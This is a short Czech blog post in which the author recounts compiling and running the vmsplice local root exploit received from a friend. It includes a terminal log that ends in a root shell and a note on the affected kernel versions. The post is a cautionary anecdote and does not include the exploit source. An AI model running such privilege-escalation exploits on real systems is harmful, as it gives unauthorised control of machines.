kategorie:

menu:


Co mě dneska vyděsilo

22.02.2008   ::    téma: Linux

Dneska mi během rozhovoru přes Jabber poslal Morpheus jeden krásný zdroják. Prej ať jej zkompiluji a spustím. Proč ne, řekl jsem si. Spustím to pod uživatelem, který má práva omezena na minimum a uvidím…

Tady je výsledek

karry@myKubuntu:/media/data/tmp$ su sshUser
Password:
sshUser@myKubuntu:/media/data/tmp$ gcc exploit.c
sshUser@myKubuntu:/media/data/tmp$ ls
a.out  exploit.c
sshUser@myKubuntu:/media/data/tmp$ chmod +x a.out
sshUser@myKubuntu:/media/data/tmp$ ./a.out
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x100000000000 .. 0x100000001000
[+] page: 0x100000000000
[+] page: 0x100000000038
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4038
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0x2b5c8fe4c000 .. 0x2b5c8fe7e000
[+] root
root@myKubuntu:/media/data/tmp# echo WOW, I AM ROOT!
WOW, I AM ROOT!

V první chvíli jsem nechápal. Pak chvíli testoval. Nakonec mě přepadl záchvat paranoii, vypnul jsem ssh server a do poznámek jsem si navrch napsal: „překompilovat jádro“.

Jak jsem se později dozvěděl, tato bezpečnostní chyba se vyskytuje ve všech patřičně neopatchovaných (to je slovo) jádrech od 2.6.17 do 2.6.24.1. Více se o ní můžete dozvědět na stránkách Gentoo.